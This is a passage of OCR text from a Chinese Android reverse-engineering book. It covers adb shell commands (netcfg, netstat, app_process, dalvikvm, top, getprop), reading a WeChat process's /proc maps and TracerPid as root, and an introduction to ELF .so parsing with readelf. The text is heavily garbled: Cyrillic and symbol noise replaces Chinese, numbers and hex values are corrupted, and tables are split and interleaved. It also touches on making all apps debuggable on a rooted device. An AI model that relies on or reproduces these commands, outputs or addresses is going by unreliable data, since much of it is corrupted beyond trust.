用 法 : netcfg 


有 时 候 想 得 


看 设备 的 jp 地 址 ， 去 设置 页 面 大 费劲 了 ， 可 以 直接 用 


shell8pisces:/ $ netcfg 


netcf«a 
wlanð 
rmnetctl 
lo 

sitð 
mhið 
p2p8 
dummyB 
ip6tnl8Ü 


UP 
DOUN 
UP 
DOUN 
DOUN 
UP 
DOUN 
DOUN 


shell8pisces:/ $ m 


10.netstat 


ІВ: 查看 设备 的 端口 号 信息 。 


用 法 : netstat 


АЕ BEA S ES Hum Ут Ц 号 信息 [куу], 


Shellepisces: $ netstat 


netstat 


Proto Recu-Q Send-Q Local fiddress 
И 127.0.80.1:54323 
B 127.8.80.1:54318 


tcp 
tcp 


tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 


tcp 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
tcp6 
udp6 
udp6 


мм 


ou N 
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1l.app process 


® ® ® ® s S sS ® sS sS sS sS sS sS sS ® S ® © ® sS sS S sS S sS S S S S S S S ® 


127.0.0.1:54297 
192.168.1.230:45319 
12'7.0.0.1:54320 
127.0.0.1:54321 
127.0.0.1:54322 
127.0.0.1:54319 
127.0.0.1:54299 
127.0.0.1:54296 
127.0.0.1:5431? 


u зз Hh Pb "e Me Me e fe Me M» M Me M Me Маг Me M Маг у P sas cas cao з 


fff:192.168.1.230:55262 
fff:192.168.1.230:57461 
fff:192.168.1.230:40275 
fff:192.168.1.2380:52713 
ҒҒҒ:192.168.1.230: 45830 
ҒҒҒ:192.168.1.230:42449 
#ҒҒ:192.168.1.230:34397 
fff:192.168.1.230:57458 
ҒҒҒ:192.168.1.230:47018 
#ҒҒ:192.168.1.230:34659 
ҒҒҒ:127.0.0.1:3880 
fff:192.168.1.230:45444 
fff:127.0.0.1:38808 
fff:192.168.1.230:3842? : 
#ҒҒ:192.168.1.230: 49055 
ҒҒҒ:192.168.1.230:41689 
fff:192.168.1.230:46551 
fff:192.168.1.230:52714 
fff:127.0.0.1:3888 


192.168.1. еа 


这 个 命令 也 是 非常 重要 的 ,例如 : 


Foreign ñddress 
127.0.0.1:38808 
127.80.0.1:38808 


127.0.0.1:38808 
121.201.19.580:7008 
127.0.0.1:3888 
127.0.0.1:3888 
127.0.0.1:3888 
127.0.0.1:3888 
127.0.0.1:3888 
127.0.0.1:3888 
127.0.0.1:3888 


* X X x 


这 个 命令 即 可 : 


124 DAR 


0x00001043 
0x00000080 
0x00000049? 
0x00000080 
0x0000009?0 
0x00001003 
0x00000082 
0x00000080 


State 


TIME_WAIT 


8c:be:be:f f :96:92 
00:00:00: 00:00:00 
00:00:00: 00: 00 : 00 
00:00:00 : 00 : 00 : 0 
26:00:90 :00:00:00 
8e:be:be:ff :96:92 
d2 :7e :8e : b9 :2d : b3 
00:00:00: 00:00:00 


ESTRBLISHED 


TIME URIT 
ESTABLISHED 
ESTABLISHED 


TIME_WAIT 
TIME_WAIT 
TIME_WAIT 
TIME_WAIT 
TIME_WAIT 


ESTABLISHED 


LISTEN 
LISTEN 
LISTEN 
LISTEN 


::ffff:203.100.92.28:80 CLOSE_WAIT 
::ffff:14.18.245.246:14000 ESTABLISHED 
::ffff:-36.7.172.114:80 CLOSE_WAIT 
::ffff:123.151.15.204:80 CLOSE_WAIT 
::ffff:61.151.168.1408:80 CLOSE_WAIT 
::ҒҒҒҒ:106.120.151.110:5263 ESTABLISHED 
::ffff:216.58.200.51:443 CLOSE_WAIT 
::ffff:14.18.245.246:14000 TIME_WAIT 
::ffff:123.151.152.147:443 CLOSE URIT 
::ffff:220.181.124.36:443 CLOSE. URIT 


[:ffff:127.0.0.1:54317 ESTABLISHED 


D:ffff:36.110.171.46:88 CLOSE URIT 


[:ffff:127.0.0.1:54318 ESTABLISHED 


:£fff:114.54.23.116:5222 ESTABLISHED 
[:ffff:183.136.203.17:80 CLOSE URIT 
::ffff:36.110.147.36:443 CLOSE URIT 
[:ffff:180.163.255.156:443 CLOSE URIT 
::ffff:123.151.15.204:88 CLOSE URIT 


[:ffff:127.0.0.1:54320 ESTABLISHED 


- 
- 


CLOSE 
CLOSE 


说 明 : 运行 Java 代 码 。 
用 法 : appP_process[ 运 行 代码 目录 ][ 运 行 主 类 ] 


案例 : 


export CLASSPATH-/data/demo.jar 
exec /system/bin/app process /data/cn.wjdiankong.Main 


这 个 命令 主要 用 于 Android 中 一 些 特 殊 开 上 友 场 景 中 ， 想 局 动 一 个 jar 包 ， 不 过 这 个 jar 包 有 要 求 : 需要 dx 命令 把 dex 文 件 转化 成 
jar 包 功能 ， 实 际 上 它 不 是 一 个 正常 的 jar 包 了 ， 而 是 一 个 包含 了 classes.dex 文 件 的 压缩 文件 了 。 


12.dalvikvm 

说 明 : 运行 一 个 dex 文 件 。 

用 法 : dalvikvm-cp[ldex 文 件 ][ 运 行 主 类 ] 

案例 : 

dalvikvm -cp /data/demo.dex cn.wjdiankong.Main 

有 时 候 为 了 测试 一 个 dex 文 件 功 能 可 以 用 到 这 个 命令 ,与 上 面 的 命令 有 很 大 相似 之 处 ， 只 是 运行 的 文件 不 一 样 。 
13.top 

襄 明 : 查看 当前 应 用 的 CPU 消耗 信息 。 


用 法 : top[-n/-m/-d/-s/-t] 


-n// 刷 新 次 数 
-d// 刷 新 间隔 时 间 (默认 5 秒 ) 
-S// 按 哪 列 排序 

-t// 显 示 线 程 信息 而 不 是 进程 


案例 : 


top -d 1 -m 10 


shellf?pisces:/ $ top -d 1 -m 18 
top -d 1 -m 18 


User 24и, System 17», IOW BZ, IRQ 8z 
User 30 + Nice 1 + Sys 23 + Idle 75 + IOW Ø + IRQ Ø + SIRQ B = 129 


PID PR CPU S  HTHR USS RSS PCV UID Name 
1702 Ü 9» R 38 9514808K 69860К fg uB a12 com.android.systemui 
1969 uH 8х S 35 935592K 60132К fg uB8 a22 com.cyanogenmod.trebuchet 
1118 Ø 77» $ 82 1008072K 84804К fyg system system seruer 
13222 Ө 7X R 1 13880K 488K shell top 
238 Ø 4» S 14 31408K 8612K fg system /system/bin/surfaceflinger 
1891 Ø 1x S 36 914296K  40296K fg uB a31 com.tianqiwhite 
32047 Ө 1» S 1 ØK ØK root kworker/ð:0 
97 Ø 1» 5 1 ØK ØK root cfinteractive 
2 Ø 8х S 1 ØK ØK root kthreadd 
8 ØB a» S 1 ak ØK root migration/B 


这 个 命令 在 分 析 应 用 性 能 的 时 候 非 常 有 用 ， 可 以 用 grep 过 滤 想 要 分 析 的 应 用 信息 ， 碍 看 它 的 当前 CPU 使 用 率 。 
14.getprop 
说 明 : 查看 系统 属性 值 。 
用 法 : getprop[ 属 性 值 名 称 ] 
案例 : 


getprop ro.debuggable 


这 个 命令 可 以 查看 设备 的 信息 ， 比 如 设备 版 本 号 、 系 统 属性 等 ， 后 面 草 节 会 介绍 在 root 设 备 之 后 ， 还 可 以 去 修改 这 些 系 统 属 
性 。 比 如 debug 开 天， 让 所 有 的 应 用 都 处 于 可 调试 状态 。 


这 里 介绍 用 cat 命 令 查 看 当前 应 用 进程 的 信息 ， 在 逆向 中 可 能 用 得 到 |。 
1. 查 看 当前 进程 的 内 存 加 载 情 ) 
可 以 使 用 如 命令 


cat /proc/ [pid] /maps 


查看 当前 进程 的 内 存 映射 信息 ， 比 如 加 载 了 哪些 so 文件 ，dex 文 件 等 : 


rüontüpiscez:^ H ps 
grep com.tencent 


ps 
ul aidH4 
ив _аій4 


grep com.tencent 


6685 239 


T758 2397 1288552 59H32 FFfFfffff 4HH7H7h4 5 com.tencent.mm 


rnüntüpiscez:^ Н са ^"proac^/7758^maps 


cat ^prac.z/7758.maps 


4002400040032 000 
4003200040803 ИИИ 
4Hi33HBHH—4HBH3 4000 
4003400040043 ИИИ 
40043000—40044000 
4004400040045 000 
4004500040046 Hh 
4004600040045 000 
40049 000—4004авви 
4004айив-4004а000 
4Bññ4d8ññ-4ññá4e ИИИ 
4ИИ4е ИИИЙ-4ИИ4+# ИЙИ 
4HBi4f ИИИ-4ИИ9' ИИИ 
4ИИ9'2ИИИ—4ИИ9 9 BHBH 
400990004009 c HBH 


а JC —— II 


r-xp HBBBHBHHHH h3:18 33221 Á/system^/hin^app. process 
r--p HBBBd4HHH h3:18 33221 Á/system^/bin^zÁ/app. process 
ru-p HBBB5HHH h3:18 33221 Á/system^/hbin^/app. process 
r-xp HBBBHBHHHH h3:18 32837 Á/system^/bin^z/linker 
r--p HHHHBBHH ВИ: ви A 

r--p HBBBHfHHH h3:18 32837 Á/system^/bin^z/linker 
rwu-p HBBiBHHHH h3:18 32837 Á/sgystem^/bin^z;linker 
к-р HHHHBBHH ИЙ-ИЙ Hñ 

r--p HHHHBBHBHH ВИ: Ви Hñ 

r-xp HBHBBBHHH h3:18 196 “= ystem^/lib^Á/lihblog.so 
r-—p HHBHBB2HHH h3:18 196 Á/usystem^/lihbzÁ/lihblog.zo 
ru-p HBBB3HHH h3:18 196 = ystem^/lihb^Á/lihblog.so 
r-xp HBBBBHHHM h3:18 11H Á/stystem^/lihbhzÁlihbc.so 
r-—-p HBHB47HHH h3:18 11H Á/system^/lih^/lihc.so 
rwu-p HBBd49HHH h3:18 11H Á/system^/lihzÁ/lihc.so 


< xC л. IT] = Tk Ik k нь EG hom 


2. 伍 看 进程 的 状态 信息 


可 以 利用 如 下 命令 


cat /proc/ [pid] /status 


查看 当前 进程 的 状态 信息 ， 比 如 熟知 的 TracerPid: 


root@pisces:/ # cat /proc/7758/status 
cat /proc/7758/status 


176304 47316 FFFfff 4HH7H7h4 $ com.tencent.mm:push 


Name : com.tencent.mm 

State: 5 sleeping? 

Tgid: 7758 

Pid: 7758 

PPid: 239 

TracerPid: 2 

Uid: 10104 10104 10104 191094 
Gid: 10104 10104 10104 10104 
FDSize: 256 

Groups: 1015 1028 3881 3002 3003 50104 
UmPeak: 1200828 kB 

UmSize: 1200552 kB 

UmLck: O kB 

UmPin: И kB 

UmnHUM: 82648 kB 

UmRSS : 59176 kB 

UmData: 269988 kB 

UmStk: 136 kB 

UmExe : 20 kB 

UnLib: 54212 kB 

UnPTE: 236 kB 

UmSwap: 日 kB 

Threads: 45 


З.т АВЛУ Fas FB 5468 


可 以 使 用 如 下 命令 


cat у proč 7 


[piq] 


获取 当前 应 用 使 用 到 的 端口 号 信息 : 


root@pisces:/ # cat /proc/7758/net/tcp6 
cat /proc/7758/net/tcp6 


51 
B: 
1: 
2: 
3: 
4: 
5: 


ERA 


PP, 


3.6 


local address 

B000000000000000000000000000000m0 : :2B6 7 
000000000000000000000000000000009 : AF28 
00000000000000000000000000000000:20C68 
00000000000000000000000000000000:96""75 
0000000000000000FFFF0008E601ñ8C0:9FFD 
0000000000000000FFFF00008E601ñ8C0:D?DE 


0000000000000000FFFF0000E601ñ8C0:ñ74D 
0000000000000000FFFF00000100007?F:80F28 
0000000000000000FFFF0000E601ñ0ñ8C0:CDE9 
0000000000000000FFFF0000E601ñ8C0:B306 
0000000000000000FFFF000808E601ñ8C0:ñ5D1 
0000000000000000FFFF0000E601ñ8C0:865D 
0000000000000000FFFF0000E6010ñ8C0:B?ññ 
0000000000000000FFFF00000100007F:D83F 
0000000000000000FFFF0000E601ñ8C0:961B 
0000000000000000FFFF0000E601ñ0ñ8C0:BF9F 
0000000000000000FFFF00000100007?F:0F28 
0000000000000000FFFF00000100007?F:0F28 
0000000000000000FFFF0000E601ñ8C0:DCG1B 
0000000000000000FFFF0000E601ñ8C0:B5D? 
0000000000000000FFFF00000100007?F:8B4F 
0000000000000000FFFF0000E6010ñ8C0:ñFBC 
08000000000000000FFFF00008E601ñ8C05:ñFB? 
0000000000000000FFFF00008E601ñ8C0:CDEñ 


22 а) shell é 


这 样 不 用 电脑 就 可 以 进行 操作 了 。 


本 章 小 结 


本 章 分 析 了 Andtroid 开 发 和 逆向 中 常 


т? 
ZN 


是 没有 那么 好 用 ， 也 就 没有 介 


第 4 章 ”so 文件 格式 解析 


重要 。 在 这 个 内 容 基 础 之 上 ， 


А39 HL. 


4.1 


AndroidFRBSsox ЕРУ, MAET ARSON, 9%? 


ELF 文 件 格式 


命令 也 可 以 在 手机 中 直接 运行 ， 


remote address 

00000000000000000000000000000000:0000 
00000000000000000000000000000000:0000 
00000000000000000000000000000000 : ANHA 
00000000000000000000000000000000 : AANA 
0000000000000000FFFF000072ñC0724:0050 
0000000000000000FFFF00001C5C64CB:0050 


0000000000000000FFFF0000F6F5120E:01BB 
0000000000000000FFFF00000100007?F:D461 
0000000000000000FFFF0000CC0F977B:0050 
0000000000000000FFFF00008Cñ08973D:0050 
0000000000000000FFFF00006E97786ñ:148F 
0000000000000000FFFF000033C83ñD8:01BB 
0000000000000000FFFF000093989'77B:01BB 
0000000000000000FFFF00000100007?F:9675 
0000000000000000FFFF000074173672:1466 
0000000000000000FFFF000011CB88B7:0050 
0000000000000000FFFF00000100007F:D460 
0000000000000000FFFF00000100007?F:D463 
0000000000000000FFFF0000B920110E:01BB 
0000000000000000FFFF00009CFFñ3B4:01BB 
0000000000000000FFFF00000100007?F:9675 
0000000000000000FFFF00002F671EDñ:0050 
0000000000000000FFFF00002F671EDñ:0050 
0000000000000000FFFF0000CC0F977B:0050 


需要 去 下 载 一 个 


步 介 绍 如 何 对 so 文件 进行 


BA 
98 


/ net / tcp / tcp6 / udp / чарб 


tx queue rx queue 
0800000000: 0800000000 
0008000000: 0000800000 
000000p00 : 0800000000 
0000000900: 0000000000 
0000000900 :0000000p1 
0000000900 :00000001 


0000000900 : 00000000 
0000000900: 00000000 
0800000000: 00000001 
0000000900: 0000000001 
0000009000: 0000000p0p 
00000000:00000001 
00000000:-00000018 
00000000:00000000 
0000000900 : 0090000000 
00000000-:00000001 
0000000900: 0600000000 
0000000900 : 0000000900 
00000000:00000000 
00000000:00000026 
0800000000 :00000000 
00000000:00000001 
0000000900: 0000000p1 
00000000:00000001 


tr tm 一 >when 
HA : 0800000000 
AA : 0800000000 
00:00000000 
00:00000000 
909:00000000 
OA :00000000 


aa: 0600000000 
02 : OAOA EB32 
00 :00000000 
HA :00000000n 
пи : 0800000000 
aa: 0600000000 
OA :00000000 
93 :000007CG1 
80 :00000000 
пи: 0600000000 
02 : 800AEB32 
02 : ВИВАЕВЗ2 
aa: 00000000 
OA :00000000 
03 :000007G1 
00 :00000000 
OA : 0800000000 
по: 0600000000 


00000006 
0800000000 
0800000000 
8080000000 
8080000000 
8080000000 
0800000000 
8080000000 
0800000000 
0800000000 
0800000000 
0800000000 
8080000000 
0800000000 
0800000000 
8080000000 
8080000000 
0800000000 


retrnsmt uid 
8000000900 18828 
8000000000 10073 
8000000900 10028 
0800000000 10073 
8080000000 10026 
0808000000 10032 


в | 
10073 
10074 
а 
10877 
10004 
1000 
а 
10032 
10831 
108073 
10073 
10074 
10073 
а 
10077 
180877 
19074 


终端 模拟 器 ”应 用 ， 直 接 在 里 面 输入 这 些 shell 命 令 


介绍 so 文件 的 内 容 ，so 文 件 的 格式 解析 非常 重要 ， 不 仅 对 Andrtoid 中 的 底层 
后 面 的 章节 中 会 进 


| 非常 高 效 的 助 推 作用 。 当 然 


页 和 5 来 了 解 一 下 ELF 文 件 的 格式 。 如 何 详细 了 解 ELF 文 件 ? 


还 有 其 他 命令 ， 


开发 非常 有 有 用， 而且 对 Android 的 安全 更 
加 密 做 到 应 用 的 安全 防护 ， 以 及 遂 向 分 析 应 用 的 so 代 


最 好 的 


HAME FAS ГАЖ УТ ЕКЕУ HE, ELF3XC/F4FSTUDIESI4-1, 


^^ ЬЯ 


КЕ reis ош ае ч 

2 а ë = = ЕУ сс ес š —  ___ | typedeÉ ztruct alfhdr { 
BBDD0BD20: - - L : : - ы. — (0h unsigned char а ident[EI WIBENT]; /* ELF Idantification */ 
prises: Ll silii | ; ; cae ds pae m 10h Elf3? Half & iypa: #® object file буре */ 
06000050: | Us се 89 UO on о, na, "Y 2,90 UU 90] ME..7..7. i 12h El£32 Malf a machine; /* machine */ 
emm НАШ dE MT OE š тетт? шы. Ps. 14h El£32 Жага * verzioh. /* object file versien */ 
aüdgaddadód F4 gH ай бй 13.00. IB BH 13. Hg HB HH. "n a n m ú m h ü REX 87] mmm R, M mI n s 18h Elfje Addr « «entry: ja virtual antry point Lr 

= 本 下 Өй 80 Bü Bü Bü "NI "77M t.. 9 Leh Elf32 Off *_phof f; fa program header table offret #/ 
UBRODGBE:| оо SD OD ов IC ез GO GO зс оз 0G во 0 00 00 ову .H..X...c....... `. 2 ЕЗ2 0f а Жоғ: /* zection header table offrat */ 
Anacapa: BB во Bü 00:01 GB вв BB зс аз вө AG à ер на .H...... QCPPLCPP 24h ELEA? Tord a flam fe procuzzer—mpacific Flagm */ 
人 кнн аве I zok El£32 Half a ahzira; da ELF haadar sira #/ 

de Ee Zuh Elf3? Half a phentzire: #® program header entry sira */ 

д и р : ] ЕБЕ — eh Elea Half а рі: /* number of program header entries */ 
00009000: :| es. ao. ao. no: 51 ES 74 ба UB UN DO BU UO OG UD ов IE zh Elf32 Malf & zhentrire: fw zaction header entry тїтє */ 
n ds = == te dine uice 30h El£32 Half алла: /* munbar ef section header entries */ 
BBDDBDF A: : en/bin/ 3th El£32 Half а shzirndx; fü zection haader tabla s “section 


ич йй йб йй йс header siring table" entry offzat #/ 


: 7n = + 7 : k." i 
H 48 MU 09) hashi о 90 00 мазат, M) ELESZ ъа: 
81 бв во ов DB В: interp! ° — x Р 


Be ue ап Bü ps | с —.—.—-—-— 


ku. 
ы. 
Bü во оо BB 18 Bü F1 FF 56 = i," E nm 本 程序 共有 6 个 Program Header 
Bü BB BB BB 18 BH F1 FF BQ | i d 79 
HB бв HH BH 12 ва HH BH 47 Е sj m 
йй 00 йй йй = ааныш | Fa ` 
па ов ай ов 18 I | | f I Trope Haadar 5j ^ 
ве өв өв ве 12 WU TU TU L f Ауре straci 1 N 
йй йй йй BH ла HA F r : düh ELE Tord p type /* segaent {уре */ | 
йй ag ag йй 18 йй a. 04h Elf3? Off poffsat; /* тереп! offret зу 
88 пп ag Bñ 18 Bà r a .. 08h EL£32 Addr p vaddr: /* virtual addrazz of zagmant */ 
oa n" өв BB 18 ве | Deh El£32 Addr p.paddr; /* physical address = ignerad? */ 
74. 108 Elf32 Tord p.filesz; /* number of bytes in file for seg. */ 
r.sp.puts.  libc 14h Elf32 Жога р. теат; /* number of bytes in mem. for seg wr 
74 00 SF SF | _init. exidx st 18h — Elf32 ord р Па: de Пал s/ | 
5F БЕ 65 78 art. _ exidx _enú. ` leh El£32 Word p align; fW manery alignment */ / 
7h 61 DD SF  edata. bss sta NI ELI? Fhir: Fi 
. Р. 
БЕ 62 73 ME rt. bss start ` p. 


r3 73 5F 65 i . bhss end . e —— -一 一 


gg aH вв Сё ВЕ 
BF E? 8H Dñ во 


f* Wo file type */ 
[К ralocatabla fila tr 

E executable file &/ 

ix shared object file */ 

{к core file */ 

Wdafina ET HUM 5 ik nunber of types X/ 

Wde£ine EI LOÜPBEUC Ох ЁЕ00 f* reserved range for processor #/ 
define EI MKIPFEUC О ЁЕЕҒ it specific е type */ 


BüBB02CD: Bü 8 2D ES вл BH BD EZ B8 Dü AD E? 08 Bü BB ES 
pBBBO2DO: DC 10 DB ES 18 30 9F ES 03 30 8F ED 03 BB ñB E1 
BBBBETEB: ED FF FF ЕВ BD 30 AA ЕЗ - з 
вйййа2Ей: ве вв BD єв SB вв ва ва 01-129 › Section Ё 
88880380: 8D ве ае Е1 ве 18 ав Ез qj 1а1еЇЯ# 10х42 
00000310: Eu ЕЕ FF ЕЙ EO FF FF Ей 3C" | 
00000220: sC йз 01 йа 5h 03 01 Dú BO Bü йй Ei Bü es 


+ 
EE 
ir 
rr 
= 
H 
т 
n | 
bei 
к 
e 
4x ыл Ка e C 


Hello un - AUS 
PSU... UU 


——— Wdefine EM НОМЕ ü f* Ko Machine Br 

Füefine EM М2 i f* АТАТ WE 32100 x/ 

WüeFine EM STABC g f* SPARC #/ 

Sdsfina EM 3BR 3 ik Intel ñD336 к/ 
pmagagie DB: Suma: аршаш а И ux mm E #defina EM БӘК 4 fk Motorola 69000 xj 
ввввозав: uc B Еее L?....- [fefine EM ВВК 5 f* Noterola 88000 x/ 
nagnaüdHH:|69 вро па AA BH BH BH ва 18 AA HH BB 15 HH HH AA 1.. = =- [#deFine EM 4BB 8 {к Intel ADIBE = шей? */ 
000003с0:| pú йй no по йз йй йй йй 1h йл 01 йй 0? йй йй йй < dmamicBt Ё #define EM SGD 7 Уж Intel 80860 &/ 
DAGAI 10 Bü HO GB 14 BB BB Bü 11 dB BB BB 17 BH BB вај ................ Süafina EM MIFZ а f* NIFS H3000 Big-Endian only */ 
BBDBBDB3ED:II 78 S7? Bü ве OB DD BH Bü BH HB ве BB вв ов Bü Dü * ———— Wde£fine EM МІР R54 BE 10 f* NIFS B4000 Pig Endian */ 
RR iii A- AA AA яй и AA AA AA AA AA пий ип ип MM AMM AA AA Š Plais- РШ OPARTE A 1i fa CDAEC aO са a=. Fi ssl aed 


图 4-1 ELF 文 件 格式 〈 见 书后 彩 图 ， 图 片 由 @ 非 虫 授权 ) 


这 张 图 已 经 很 详细 了 ， 后 面 用 Java 代 码 来 解析 ELF 文 件 的 时 候 ， 融 是 按照 这 张 图 来 进行 的 。 


42 解析 工具 


需要 介绍 一 个 工具 readelf， 因 为 这 个 工具 在 解析 ELF 文 件 的 时 候 也 非常 有 用 ， 而 且 是 检查 解析 ELF 文 件 的 模板 。 不 过 


Window 下 这 个 命令 不 能 用 ， 因 为 这 个 命令 是 Linux 的 ， 所 以 还 得 做 个 工作 ， 融 是 安 丢 Cygwin。 
提示 : Cygwin 下 载 地 址 : http://pan.baidu.com/s/1C1Zci 


下 载 Cygwin 之 后 ， 需 要 改 一 个 东西 才能 用 ， 如 图 4-2 所 示 。 


"P. 


di bin 2015/10/10 15:20 БЕ 
|) cygdrive 2015/10/9 10:58 БЕ 
d dev 2015/10/10 15:20 ”文件 去 
Дф] etc 2015/10/10 15:20 {БЕ 
Jj. home 2016/6/20 18:38 УЕ 
A lib 2015/10/10 15:23 ”文件 去 
| opt 2015/10/10 15:23 ”文件 去 
|i sbin 2015/10/10 15:22 ”文件 去 
| tmp 2016/6/21 16:10 ”文件 去 
|) usr 2015/10/10 15:32 ”文件 去 
K var 2015/10/10 15:33 ”文件 去 
Cygwin.bat 2016/6/23 21:16 Windows 批 处 理 .. 1 KB 
[= Cyawin.ico 2015/9/6 15:54 图 标 154 KB 
Е Cyawin-Terminalico 2015/9/6 15:54 图 标 53 KB 


84-2 下载 Cyewin 工 具 


改 一 下 这 个 文件 : 
Ej Cygwin.bat - 记事 二 
| PROF) 808) füxt(O) 查看 (V) #EBh(H) 


Mecho aff 


р: 
chdir D:"Androld taools*cvegwinbd*cvegwinbd*bin 
bash --login 3 
将 路 径 要 改 成 你 本 地 cygwin64 中 的 bin 目 录 的 路 径 ， 不 然 运行 错误 。 改 好 之 后 ， 直 接 运 行 Cygwin bat 就 可 以 了 。 
关于 readelf 工 具 我 们 这 里 不 做 太 详细 的 介绍 ， 只 介绍 本 章 要 用 到 的 命令 ， 

1.readelf-h xxx.so 


查看 so 文件 的 头 部 信息 ， 如 下 所 示 : 


jiangweil-g@jiangweil-g-D1 /cygdrive/d 
S readelf -h libhello-jni.so 


ELF X: 

Magic: 7f 45 4с 46 01 01 01 00 00 00 00 00 OO 00 00 00 
Class: ELF32 
Data: A's complement, little endian 
Version: 1 (current) 
OS/ABI: UNIX - System V 
ABI Version: 0 

Туре: DYN ( 共享 目标 文件 ) 

Machine: ARM 

Version: 0x1 

入 口 点 地 址 : 0х0 

程序 头 起 点 : 52 (bytes into file) 

Start of section headers: 12592 (bytes into file) 

标志 : 0x5000000, Version5 EABI 

本 头 的 大 小 : 52 (€) 

程序 头 大 小 : 32 (#7) 

Number of program headers: J 

节 头 大 小 : 40 (FF) 

d ЖЖ $ 21 


FA PRRI Ek: 20 
2.readelf-S xxx.so 


查看 so 文件 的 节 (Section) 头 的 信息 ， 如 下 所 示 : 


jiangweil-g@jiangweil-g-D1 /cygdrive/d 


S readelf -S libhello-jni.so 
共有 21 个 节 头 ， 从 偏 移 量 0x3130 开始 : 


节 头 : 
[Nr] Name Type 
[ 0) NULL 
[ 1] .dynsym DYNSYM 
[ 2] .dynstr STRTAB 
[ 3] .hash HASH 
[ 4] .rel.dyn REL 
[ 5] .rel.plt REL 
L 6] „рї PROGBITS 
[ 7] .text PROGBITS 
[ 8] .rodata PROGBITS 
[ 9] .ARM.extab PROGBITS 
[10] .ARM.exidx ARM EXIDX 
[11] „її array FINI ARRAY 
[12] .init array INIT ARRAY 
[13] .dynamic DYNAMIC 
[14] .got PROGBITS 
[15] .data PROGBITS 
[16] .bss NOBITS 
[17] .comment PROGBITS 
[18] .note.gnu.gold-ve NOTE 
[19] .ARM.attributes ARM ATTRIBUTES 
[20] .shstrtab STRTAB 
Key to Flags: 
W (write), A (alloc), X (execute), M 
I (info), L (link order), G (group), 
O 


(extra OS processing required) o 


3.readelf-l xxx.so 


查看 so 文件 的 程序 段 头 信息 (Program) ， 如 下 所 示 : 


Addr 

00000000 
00000114 
00000484 
00000948 
00000ac0 
000000500 
00000038 
00000ba0 
00002030 
00002048 
00002078 
00003eb8 
00003ec0 
00003ec4 
00003fbc 
00004000 
00004004 
00000000 
00000000 
00000000 
00000000 


(merge)j; 
T (TLS), 
(OS specific), p 


jiangweil-gG8jiangweil-g-D1 /cygdrive/d 


Off 

000000 
000114 
000484 
000948 
О00асо 
000600 
000038 
000ba0 
002030 
002048 
002078 
002eb8 
002ec0 
002ес4 
0O2fIbe 
003000 
003004 
003004 
00302c 
003048 
003075 


Size 

000000 
000370 
0004c1 
000178 
000040 
000038 
000068 
001490 
000018 
000030 
0000c0 
000008 
000004 
0000f8 
000044 
000004 
000000 
000026 
00001c 
00002d 
000008 


S (strings) 
E (exclude), 
(processor specific) 


ES Flg Lk Inf Al 


00 
10 
00 
04 
08 
08 
00 
00 
00 
00 
08 
00 
00 
08 
00 
00 
00 
01 
00 
00 
00 


X 


0 

A 2 
A 0 
A ] 
A ]1 
A 1 
AX 0 
AX 0 
A 0 
A 0 
AL 7 
WA 0 
WA 0 
WA 2 
WA 0 
WA 0 
WA 0 
MS 0 
0 

0 

0 


(unknown) 


0 


сә < O со со CX со со 65 CO со CO соо с> соб C OG F9 


L2 кә og ә S" ga ga һә нъ oa S ОО нъ нъ нъ нъ нъ ә нъ O 


S readelf -1 libhello-jni.so 


Elf 文件 类 型 为 DYN ( 共享 目标 文件 ) 
ХЕ д 0х0 
共有 7 个 程序 头 ， 开 始 于 偏 移 量 52 


程序 头 : 
Type Offset VirtAddr PhysAddr 
PHDR 0x000034 0x00000034 0x00000034 
LOAD 0x000000 0x00000000 0x00000000 
LOAD 0x002eb8 0x00003eb8 0x00003e6b8 
DYNAMIC 0х002ес4 0x00003ec4 0x00003ec4 
GNU. STACK 0x000000 0x00000000 0x00000000 
EXIDX 0x002078 0x00002078 0x00002078 
GNU. RELRO 0x002eb8 0x00003eb8 0х00003Зер8в 
Section to Segment mapping: 
Кз... 
00 
01 .dynsym .dynstr .hash .rel.dyn .rel.plt 
.ARM.exidx 
02 .fini array .init array .dynamic .got 
03 .dynamic 
04 
05 .ARM.exidx 
06 .fini , array „init array .dynamic .got 


4.readelf-a xxx.so 


查看 so 文件 的 全 部 内 容 ， 如 下 所 示 : 


S readelf -а libhello-jni.so 


ELF 


12592 
Version5 EABI 


(bytes into file) 
(bytes into file) 


Addr 


X: 

Magic: 

Class: ELF32 

Data: A's complement, 
Version: 1 (current) 
OS/ABI: UNIX - System V 
ABI Version: 0 

Type: рүм (共享 目标 文件 ) 
Machine: ARM 

Version: 0x1 

An AHA: 0x0 

程序 头 起 点 : 52 

Start of section headers: 

标志 : 0х5000000, 

本 头 的 大 小 : 52 (FF) 

程序 头 大 小 : 32 (€) 

Number of program headers: 

4 3X X^: 40 (FF) 

节 头 数量 : 21 

字符 串 表 索引 节 头 : 20 

[Nr] Name Type 

[ O] NULL 


MemSiz 

0x000e0 
0x02138 
0x0014c 
0x000f8 
0x00000 
0x000c0 
0x00148 


FileSiz 
0x000e0 
0x02138 
0x0014c 
0x000f8 
0x00000 
0x000c0 
0x00148 


.plt .text 


.data 


ТЕ 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 


little endian 


Off Size 


.rodata 


00000000 000000 000000 00 


Align 
0x4 
0x1000 
0x1000 


.ARM.extab 


ES Flg Lk Inf Al 


0 0 0 


[ 1] .dynsym DYNSYM 00000114 000114 000370 10 2 1 4 
| 2] .aGynstr STRTAB 00000484 000484 0004с1 00 0 H 1 
[ 3] .hash HASH 00000948 000948 000178 04 1 0 4 
[ 4] .rel.dyn REL 00000ac0 000ac0 000040 08 1 0 4 
[ 5] .rel.plt REL 00000b00 000500 000038 08 l 6 4 
L б] «pit PROGBITS 000005038 000538 000068 00 0 0 4 
[ 7] .text PROGBITS 00000ba0 000ba0 001490 00 0 0 4 
[ 8] .rodata PROGBITS 00002030 002030 000018 00 0 0 8 
[ 9] .ARM.extab PROGBITS 00002048 002048 000030 00 0 0 4 
[10] .ARM.exidx ARM_EXIDX 00002078 002078 0000c0 08 7 0 4 
[11] .fini_array FINI_ARRAY 00003eb8 002eb8 000008 00 0 0 4 
[12] .init array INIT ARRAY 00003ecO 002есо 000004 00 WA 0 0 1 
[13] .dynamic DYNAMIC 00003ec4 002ес4 0000f8 08 WA 2 0 4 


还 有 很 多 命令 及 用 法 ， 这 里 残 不 细 齐 了 。 


43 散 析 ELF 文 件 


